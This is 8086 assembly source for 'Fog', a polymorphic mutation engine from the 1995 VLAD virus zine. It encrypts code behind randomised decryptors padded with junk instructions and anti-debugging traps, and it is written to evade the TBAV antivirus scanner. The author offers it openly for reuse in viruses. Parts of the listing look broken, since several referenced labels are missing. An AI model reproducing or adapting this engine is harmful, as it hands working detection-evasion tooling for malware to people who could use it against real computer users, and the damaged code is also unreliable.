Virus Labs & Distribution
VLAD #5 - Fog.asm
title Fog - the funky opcode generator
subttl 1.0.01 Released June 1995
.radix 16
segment code word
assume cs : code, ds : code, es : code, ss : code
public fog_init, fog, rnd
fogsize = end_fog
include "switches.inc"
; internal switches - used only by fog:
sw_nojmps equ 00000001b
sw_displ equ 00000010b
sw_directn equ 00000100b
sw_int4 equ 00001000b ; unused
sw_int5 equ 00010000b ; unused
sw_int6 equ 00100000b ; unused
sw_int7 equ 01000000b ; unused
sw_int8 equ 10000000b ; unused
; internal data structure
struc datstruc
code_buffer dw 0 ;code buffer
code_ip dw 0 ;code offset
code_length dw 0 ;code length
dec_offset dw 0 ;offset in decryptor
encr_key dw 0 ;encryption key
gb_switches db 0 ;switches
dh_switches db 0 ;
gn_switches db 0 ;
in_switches db 0 ;
count_reg db 0 ;counter reg
base_reg db 0 ;base reg
key_reg db 0 ;key reg
rolls db 0 ;rolls on key
keypos dw 0 ;pos in decryptor of the key
lastjmp dw 0 ;last unupdated jmp
displ dw 0 ;displacement
; What to put in ah on dos calls.
; None of these change any registers except AX.
i_table db 61, 1dh, 1eh, 20, 2eh, 45, 4dh
; One byte junk instruction table.
; It is possible to expand the engine by replacing the number 1fh
; in the random function of flow_controller by 3fh (or 7f, ff),
; increasing the indexing capability. Then you can add as many new
; junk generating routines as you find appropriate. This will add lots
; to the size of the engine, because you will have to add many new
; one-byte intructions and junk routines to fill the increased index space.
onebytes db 90 ;nop This nop could be replaced
db 90 ;nop as could this (possibly 0d6h?)
db 40 ;inc ax
db 48 ;dec ax
db 90 ;nop
db 98 ;cbw
db 9bh ;wait
db 9eh ;sahf
db 9fh ;lahf
break db 0cch ;int 3
db 0ech ;in al, dx
db 0edh ;in ax, dx
db 0d7h ;xlat
db 0f5h ;cmc
db 0fch ;cld
db 0fdh ;std
db 0f8h ;clc
db 0f9h ;stc
ends datstruc
; NB: The one byte instructions of aaa, aas, daa, das generate tbav @ flags
; and have not been included in the one-byte table.
; The d6 instruction, which is undefined in the 80X86 instruction set, could've
; been used, as it seems to have no effect. However, it generates tbav ! flags,
; which together with the G flag causes tbav alert. If you should decide to use
; it, it would effectively kill any tbclean attempt - making tbclean croak with
; an "invalid opcode" message.
; Register encoding definitions for internal use
rax equ 00
rbx equ 03
rcx equ 01
rdx equ 02
rsp equ 04
rbp equ 05
rsi equ 06
rdi equ 07
cryptinstr equ 0fh ;Amount of crypt instructions
;to use
cryptobuf equ ( cryptinstr ) * 3 ;crypto buffer
buffer_offs equ ( offset buffer - offset i_data )
;absolute offset to buffer
roll_offs equ ( offset rollit - offset i_data ) + 1
;absolute offset to roll instr.
;when decrementing decryptor,
;the rol has to be changed into
;a ror
id equ ( datstruc ptr bx ) ;just simplifying things some
; FOG label
db '[Fog 1.0]'
; Initialise fog
proc fog_init
push ax bx ds
call set_base ;set ds:bx -> cs:i_data
mov [ word id . gb_switches ], ax ;������Ŀ
mov [ word id . gn_switches ], cx ; �
mov [ id . code_buffer ], dx ; �� fill values into
mov [ id . code_length ], si ; � internal data area
mov [ id . code_ip ], di ; �
mov [ id . break ], 0cch ;��������
test [ id . gn_switches ], sw_r_garb ;�Ŀ
jz @@1 ; �
call rnd_07 ; �
mov al, 0ffh ; �� randomise junk
shr al, cl ; �
mov [ id . gb_switches ], al ; �
@@1: ;��������
test [ id . gn_switches ], sw_r_host ;�Ŀ
jz @@2 ; �
call rnd_ff ; �� randomise hostility
mov [ id . dh_switches ], al ; �
@@2: ;��������
call max_codesize ; return max mem used
pop ds bx ax
ret ;return: fog data area filled with
;necessary constants
endp fog_init
; --====--
; Encrypt code and add decryptor, store all in es:0 ->
proc fog
push ax bx si di bp ;save regs
call set_base ;set bx at data struc
mov [ id . dec_offset ], bp ;set offset to use in decryptor
mov al, 90 ;������Ŀ
mov cx, cryptobuf ; �
mov si, bx ; �
nextnop: ; �� init crypto buffer
mov [ si + buffer_offs ], al ; �
inc si ; �
loop nextnop ;��������
test [ id . dh_switches ], sw_int3 ;���Ŀ
jnz genint3 ; �� don't use int 3's
mov [ id . break ], al ; � replace CC with 90
genint3: ;��������
call rnd_ax ; �
add [ id . encr_key ], ax ; �� randomise key
rol ax, cl ; �
add [ id . encr_key ], ax ;��������
and [ id . in_switches ], not sw_directn ;
mov [ byte bx + roll_offs ], 0c2h ; �
call rnd_z ; �
jz up ; �� randomise up/down
or [ id . in_switches ], sw_directn ; � if down, invert
mov [ byte bx + roll_offs ], 0cah ; � rol -> ror
up: ;��������
xor di, di ;set buffer offset = 0
and [ id . gn_switches ], not sw_displ;�
mov ax, di ; �
jz n_disp ; �
or [ id . in_switches ], sw_displ; �� randomise displ.
call rnd_ax ; �
n_disp: ; �
mov [ id . displ ], ax ;��������
test [ id . dh_switches ], not sw_debug;�
jnz nodebug ; �� if debug,
mov [ id . encr_key ], di ; � zero key
nodebug: ;��������
mov [ word id . count_reg ], di ;������Ŀ
mov [ word id . key_reg ], di ; �� zero regs
mov [ word id . keypos ], di ;��������
call reg_init_strategy ;������Ŀ
call reg_init_strategy ; �� determine regs
call reg_init_strategy ;��������
push bp
mov bp, di ;store loopback offset
; below : crypto instruction
; generation loop
mov cl, cryptinstr ;����������������������Ŀ
call rnd ; �
mov si, cryptobuf ; �
new_func: ; �
push cx ; �
call junk ; junk �
dec si ; �
dec si ; �
; �
call rnd_03 ; �
; �
loop addfunc ;������Ŀ �
subfunc: ; �� sub �
mov dx, 2903h ; � �
addfunc: ;������Ĵ �
loop xorfunc ; �� add �
mov dx, 012bh ; � �
xorfunc: ;������Ĵ �
loop det_func ; �� xor �
mov dx, 3133h ; � �
det_func: ;�������� �
; �
call getseg ;cs:/ds:/es:/ss: �
; �
call rnd_z ; �
jnz immediate_keys ; �
; �
;������Ŀ �
mov ah, dh ; � �
stosw ; � �
mov al, [ id . key_reg ] ; � �
mov cl, 3 ; �� register �
shl al, cl ; � keyed �
call xlatreg ; � �
mov dh, 0c2h ; � �
mov [ bx + si + buffer_offs ], dx ; � �
jmp short @@1 ;������Ĵ �
; � �
; � �
immediate_keys: ; � �
dec si ; � �
and dh, 0feh ; � �
add dl, 02 ; � �
mov ah, 81 ; � �
stosw ; �� immediate �
mov al, dh ; � keyed �
call xlatreg ; � �
call rnd_ax ; � �
test [ id . dh_switches ], not sw_debug;� �
jnz n_debug ; � �
xor ax, ax ; � �
n_debug: ; � �
stosw ; � �
mov [ bx + si + buffer_offs ], dl ; � �
mov [ bx + si + buffer_offs + 1], ax ; � �
@@1: ;�������� �
pop cx ; �
loop new_func ;������������������������ �
call junk ;add junk
call rnd_z ;������Ŀ
jz no_roll ; �
call rnd_07 ; �
mov [ id . rolls ], cl ; �
mov ax, 0c0d1h ; �
or ah, [ id . key_reg ] ; �� randomise and
new_roll: ; � add rol's
stosw ; �
call junk ; junk �
loop new_roll ; �
no_roll: ;��������
call computepos ;increment base position
call junk ;add junk
lea ax, [ bx + (offset jmps_finished - offset i_data) ]
push ax ;for people who might not
;understand what I do here:
;I push the address of
;jmps_finished onto the stack,
;so that following ret's
;will bring me there.
mov al, [ id . count_reg ]
or al, 48 ;dec count
call rnd_03 ;randomise
lea dx, [ bp - 1 ] ;backward jump strategies.
sub dx, di
cmp dx, 0ff80h ;can't use short jmps
jbe jmp_strategy3 ;if decryptor too long
loop jmp_strategy3
cmp [ id . count_reg ], rcx ; is CX count reg?
jnz jmp_strategy2
call rnd_z ; if so, we might use loop
jz jmp_strategy2 ; but only randomly so
jmp_strategy1: ;������Ŀ
dec di ; �
mov ah, dl ; �� loop back
mov al, 0e2 ; �
ret ; �
jmp_strategy2: ; �
dec dx ; �
mov ah, dl ; �� jnz back
mov al, 75 ; �
ret ; �
jmp_strategy3: ; �
loop jmp_strategy4 ; �
longjmp: ; �
mov ax, 0374 ; �
stosw ; �� jz $+3
mov al, 0e9 ; � jmp back
stosb ; �
lea ax, [ bp - 2 ] ; �
sub ax, di ; �
ret ; �
jmp_strategy4: ; �
mov ax, 0574 ; �
stosw ; �
call find_reg ; �
push ax ; �
or al, 0b8h ; �� jz $+5
stosb ; � mov reg, offs back
mov ax, bp ; � push reg
add ax, [ id . dec_offset ] ; � ret
stosw ; �
pop ax ; �
or ax, 0c350 ; �
ret ;��������
call junk ;add junk
test [ id . in_switches ], sw_directn ;Ŀ
jz n_prefetch_buf ; �
mov ax, 00ebh ; �� clear prefetch queue
stosw ; �
n_prefetch_buf: ;��������
mov ax, 0e990
mov dx, [ id . encr_key ] ;put encryption key in dx
mov bp, di ;������Ŀ
call scramble_word ; �
stosw ; �� crypt jmp to
mov ax, [ id . code_ip ] ; � code offset
call scramble_word ; �
stosw ;��������
mov ax, [ id . code_length ] ;������Ŀ
shr ax, 1 ; �� div code length
inc ax ; � by key length
mov cx, ax ;��������
mov si, [ id . code_buffer ] ;where to get data to crypt
newword: ;������Ŀ
lodsw ; �
call scramble_word ; �� encrypt
stosw ; �
loop newword ;��������
test [ id . in_switches ], sw_directn ;Ŀ
jz n_adjust ; �
lea bp, [ di - 2 ] ; �
mov si, [ id . keypos ] ; �� if down decryptor
mov cl, [ id . rolls ] ; � encr. key has to be
rol dx, cl ; � adjusted because
mov [ es : si ], dx ; � of the rol's
n_adjust: ;��������
pop si
add bp, [ id . dec_offset ]
add [ es : si ], bp ;adjust start of decrypt
test [ id . dh_switches ], not sw_debug;�
jz all_ok ; �
push ax ; �
call scramble_word ; �
pop cx ; �� if not debug, test
cmp ax, cx ; � if decryptor
jnz all_ok ; � really encrypts
jmp restart ; � if not, restart
all_ok: ;��������
test [ id . gn_switches ], sw_const_s;�Ŀ
jz nostatic ; �
push ax ; �
call max_codesize ; �
pop ax ; �� if constant size,
sub cx, di ; � pad up to max
jbe nostatic ; � codesize
rep stosb ; �
nostatic: ;��������
mov cx, di
add cx, [ id . dec_offset ]
neg cx
test [ id . gn_switches ], sw_align256;Ŀ
jz test16 ; �� 256 byte alignment?
and cx, 0ffh ; �
jnz pad ;��������
test16: ;������Ŀ
test [ id . gn_switches ], sw_align16 �
jz nopad ; �� 16 byte alignment?
and cx, 0f ; �
jz nopad ;��������
rep stosb ;do the padding
mov cx, di ;set cx = bytes crypted
push es ;set ds:dx = crypted code
pop ds
xor dx, dx
pop bp di si bx ax ;restore regs
;RETURN: Encrypted and mutated code in ES:DI = DS:DX = DS:0
; Number of bytes in CX
endp fog
; Get random (almost) number from timer
proc rnd
push bx
mov bx, ax
mov bh, bl
mov ch, 0
in ax, 40h
and ax, cx
push cx
xchg ax, cx
in ax, 40h
add ax, bx
ror ax, cl
pop cx
and ax, cx
jnz @@1
inc ax
pop bx
mov cl, al
ret ;return: AL/CL = rnd (1..CL)
endp rnd
; Set base (bx) at internal data struc
proc set_base
call myip
pop bx
sub bx, myip - i_data
push cs
pop ds
ret ;return: BX pointing at i_data
endp set_base
; Check that requested register (in al) is unused
proc reg_used
cmp al, [ id . key_reg ] ;key register
jz @@1
cmp al, [ id . count_reg ] ;counter register
jz @@1
cmp al, [ id . base_reg ] ;base register
jz @@1
cmp al, rsp ;SP, not to be used
ret ;return : Z if reg is used
endp reg_used
; Find unused register
proc find_reg
call rnd_07
call reg_used
jz find_reg
mov dl, al
ret ;return: unused register in AL and DL
endp find_reg
; Rand 1-3
proc rnd_03
mov cl, 03h
call rnd
ret ;return: AL/CL = rnd (1..3)
endp rnd_03
; Rand 1-7
proc rnd_07
mov cl, 07h
call rnd
ret ;return: AL/CL = rnd (1..7)
endp rnd_07
; Rand 1-255
proc rnd_ff
mov cl, 0ffh
call rnd
ret ;return: AL/CL = rnd (1..255)
endp rnd_ff
; A random Yes/No function
proc rnd_z
push ax cx
call rnd_ff
test al, 01h
pop cx ax
ret ;return: rnd Z/NZ
endp rnd_z
; Translate register values into valid instruction
proc xlatreg
or al, 04
cmp [ id . base_reg ], rsi
jz @@2
or al, 05
cmp [ id . base_reg ], rdi
jz @@2
or al, 07
test [ id . in_switches ], sw_displ
jz @@3 ;displacement?
or al, 80h
mov ax, [ id . displ ]
ret ;return: Valid instruction
;in decryptor
endp xlatreg
; Encrypt word in ax
proc scramble_word
push cx
db cryptobuf dup (90)
mov cl, [ id . rolls ]
rol dx, cl
pop cx
ret ;return: AX crypted by
;whatever. Fog modifies
;itself randomly here, and
;creates mundo
;different encryptors.
endp scramble_word
; Position updating strategies
proc computepos
call rnd_z
jz @@3
mov al, 83
call rnd_z
mov ax, 02c0 ;strategy 1/2 : add reg, 2/-2
jz @@1
mov ax, 0fee8 ;strategy 3/4 : sub reg, 2/-2
test [ id . in_switches ], sw_directn
jz @@2
neg ah ;decrementing decryptor
@@2: ;incrementing decryptor
or al, [ id . base_reg ]
mov al, 40 ;strategy 5 : inc reg inc reg
test [ id . in_switches ], sw_directn
jz @@4
or al, 08 ;strategy 6 : dec reg dec reg
or al, [ id . base_reg ]
stosb ;add pos instr
call junk ;add junk
stosb ;add pos instr
ret ;
;return: Updates the base register in the decryptor
endp computepos
; Get segment override prefix
proc getseg
test [ id . gn_switches ], sw_exefile
jz use_all
mov al, 2eh
call rnd_ff
and al, 3eh
or al, 26h
;return : random 2eh/3eh/26h/36h: (CS:/DS:/ES:/SS:) in AL
;if EXE only CS: will be returned
endp getseg
; Compute maximum code length
proc max_codesize
mov al, [ id . gb_switches ]
xor ah, ah
mov cx, ((0dh+cryptinstr)*3)/2 ;garb. calls times 1.5 bytes avg
mul cx ;times max no. of junk instr.
add ax, 9 + (cryptinstr*7) + 7*2 + 3 + 8 + 2 + 4
add ax, [ id . code_length ]
xchg ax, cx
ret ;return: max encrypted size in CX
endp max_codesize
; Pick regs to use in vital instructions
proc reg_init_strategy
call junk
call find_reg
call rnd_03
loop cntfunc
cmp [ id . base_reg ], ch
jnz cntfunc_
posfunc: ;can only use bx, si or di
mov al, dl
cmp al, rbx
jz regok
cmp al, rsi
jz regok
cmp al, rdi
jz regok
call find_reg
jmp short posfunc
mov [ id . base_reg ], al
or al, 0b8
mov bp, di
xor ax, ax
sub ax, [ id . displ ]
loop keyfunc
cmp [ id . count_reg ], ch
jnz keyfunc
mov al, dl
mov [ id . count_reg ], al
or al, 0b8
mov ax, [ id . code_length ]
shr ax, 1
add ax, 3
cmp [ id . key_reg ], ch
jnz reg_init_strategy_
mov al, dl
mov [ id . key_reg ], al
or al, 0b8
mov ax, [ id . encr_key ]
mov [ id . keypos ], di
;return: random register chosen and put in base_reg, count_reg or key_reg
endp reg_init_strategy
; 017 : Flow controller - Fork junk code generation in different directions
; Model: 1. Get random no. in CX
; 2. loop r2
; routine no1
; ret
; r2:
; loop r3
; routine no2
; ret
; r3:
; loop r4
; ......
; end of routines.
; 3. The number in CX can be higher than
; the amount of generation routines.
; If so, whatever left in CX is used
; as index into one-byte instruction
; table.
; 4. To add another routine:
; Make a routine creating an instruction
; subgroup. It should be on the form:
; rx1:
; loop rx2
; generation routine
; ret
; rx2:
; !NB Remember all these routines return to either sword
; (stosw) or sbyte (stosb).
; After adding the routine, remove one of the one-byte
; instructions in the one-byte table, pref. one of the
; extra nops. The new routine has now taken its place in
; the index space.
; The rules for junk instructions in the decryptor are:
; 1. They must not change registers that are used for
; the functionality of the decryptor. You can check for
; this at any time by putting register no. in al and
; call reg_used, returning Z if used, or simply call
; find_reg, which will return an unused register in al.
; 2. AX can always be changed
; 3. SP must never be changed.
proc flow_controller
mov cl, 1fh
call rnd
lea ax, [ bx + (offset sword - offset i_data) ]
push ax ;return to sword
s1: ;������Ŀ
loop s2 ; �
call find_reg ; �
call rnd_ax ; �
and ax, 073bh ; �� and/add/adc/
or ax, 0c003h ; � sub/sbb/cmp/
mov cl, 3 ; � xor/or reg, reg
shl dl, cl ; �
or ah, dl ; �
ret ; �
s2: ; �
loop s3 ; �
call rnd_ax ; �� and/add/adc/
and al, 03ch ; � sub/sbb/cmp/
or al, 04 ; � xor/or al, imm byte
ret ; �
s3: ; �
loop s4 ; �
mov cl, 3fh ; �
call rnd ; �
and al, 3dh ; �
or al, 05h ; �
stosb ; �� and/add/adc/
rnd_ax: ; � sub/sbb/cmp/
call rnd_ff ; � xor/or ax, imm word
mov dh, al ; �
call rnd_ff ; �
mov ah, dh ; �
ret ; �
s4: ; �
loop s5 ; �
call find_reg ; �
cmp al, rbx ; �
ja s5_ ; �� mov reg, imm byte
or dl, 0b0 ; �
call rnd_ax ; �
mov al, dl ; �
ret ; �
s5: ; �
loop s6 ; �
s5_: ; �
call find_reg ; �� mov reg, imm word
or al, 0b8 ; �
stosb ; �
call rnd_ax ; �
ret ; �
s6: ; �
loop s7 ; �
call find_reg ; �
call rnd_07 ; �� push reg, pop reg
mov ah, dl ; �
or ax, 5850 ; �
ret ; �
s7: ; �
loop s8 ; �
test [ id . in_switches ], sw_nojmps; �
jnz s5_ ; �
mov [ id . lastjmp ], di ; �
or [ id . in_switches ], sw_nojmps; �
call rnd_ff ; �
call rnd_z ; �� jmp short/
jz conditional ; � jmp on condition
mov al, 0ebh ; �
ret ; �
conditional: ; �
and al, 0fh ; �
or al, 70 ; �
ret ; �
s8: ; �
loop s9 ; �
test [ id . dh_switches ], sw_use_ints; �
jz s9_ ; �
call rnd_07 ; �
add al, (offset i_data.i_table - offset i_data)-1; �� mov ah, imm byte
xlat ; � int 21
mov ah, al ; �
mov al, 0b4h ; �
stosw ; �
mov ax, 21cdh ; �
ret ; �
s9: ; �
loop s10 ; �
s9_: ; �
call find_reg ; �
call rnd_z ; �
jnz n_prefix ; �
call getseg ; �
stosb ; �
n_prefix: ; �
call rnd_07 ; �
cmp al, dl ; �
jnz n_equal ; �
dec ax ; �
n_equal: ; �
mov cl, 3 ; �� mov reg, reg/
shl dl, cl ; � mov reg, [m16]
or dl, al ; �
mov ah, dl ; �
or ah, 0c0 ; �
mov al, 8bh ; �
call rnd_z ; �
jz nodisp ; �
or ah, 06 ; �
and ah, 03eh ; �
stosw ; �
call rnd_ax ; �
dec ax ; �
jnc nodisp ; �
dec ax ; �
nodisp: ; �
ret ; �
s10: ; �
loop s11 ; �
test [ id . dh_switches ], sw_prefetch; �
jz s9_ ; �
call getseg ; �
stosb ; �
mov dx, 06c7h ; �
mov ax, dx ; �
stosw ; �
lea ax, [ di + 4 ] ; �
add ax, [ id . dec_offset ] ; �� prefetch trap
push ax ; �
stosw ; �
mov ax, 020cdh ; �
stosw ; �
call getseg ; �
stosb ; �
mov ax, dx ; �
stosw ; �
pop ax ; �
stosw ; �
mov ax, 0c72e ; �
ret ; �
s11: ; �
loop s12 ; �
call find_reg ; �
call rnd_ax ; �� rol/ror/rcr/rcl
and ax, 0d8d3h ; � reg, 1/cl
or ax, 0c0d1h ; �
or ah, dl ; �
ret ; �
s12: ; .
pop ax ; .
lea ax, [ bx + (offset sbyte - offset i_data) ]; . Return to sbyte
push ax ; .
; .
loop s13 ; �
call find_reg ; �� xchg ax, reg
or al, 90 ; �
ret ; �
s13: ; �
loop store_one ; �
call find_reg ; �
call rnd_ff ; �� dec/inc reg
and al, 08h ; �
or al, dl ; �
or al, 40 ; �
ret ; �
store_one: ; �
mov ax, cx ; �� look up one byte
add al, (offset i_data.onebytes - offset i_data)-1;� instruction in table
xlat ; �
ret ;��������
endp flow_controller
; Junk instructions
proc junk
push ax cx si
mov cl, [ id . gb_switches ] ;cl==configured amount of
test cl, sw_001_gi ;junk
jz @@1
and [ id . in_switches ], not sw_nojmps
or [ id . lastjmp ], -1 ;prime for jmp generation
call rnd ;al/cl = [1..cl]
new_instr: ;����������������������Ŀ
;������Ŀ �
cmp cl, 3 ; � �
ja @@2 ; � �
or [ id . in_switches ], sw_nojmps; � �
@@2: ; � �
; � �
mov si, [ id . lastjmp ] ; � �
inc si ; � �
jz @@5 ; � �
lea ax, [ di - 1 ] ; � �
sub ax, si ; � �
; � �
or al, al ; � �
jz @@5 ; �� logistics �
cmp ax, 007fh ; � dealing with �
ja @@5 ; � the junk �
cmp al, 70h ; � jmps and how �� junk
ja @@3 ; � they are � loop
cmp cl, 3 ; � updated to �
jbe @@4 ; � show a proper�
call rnd_z ; � offset. �
jnz @@5 ; � �
@@3: ; � �
and [ id . in_switches ],not sw_nojmps;� �
@@4: ; � �
mov [ es : si ], al ; � �
@@5: ;�������� �
; �
; �
push cx ; �
call flow_controller ;gen. 1 junk instr. �
pop cx ; �
; �
loop new_instr ;������������������������
pop si cx ax
ret ;return: random amount (between 0 and
;the configured max number) of junk
;instr. in decryptor
endp junk
; Data work area
i_data datstruc <>
end_fog = $+1
ends code
; Feel free to modify this code in any way possible, as this
; will add an extra level of mutation. However, please don't
; use the name FOG on any modified versions. And; look out for
; fog 2.0 coming soon to a zine near you.
; Eclipse, Queensland, June 1995
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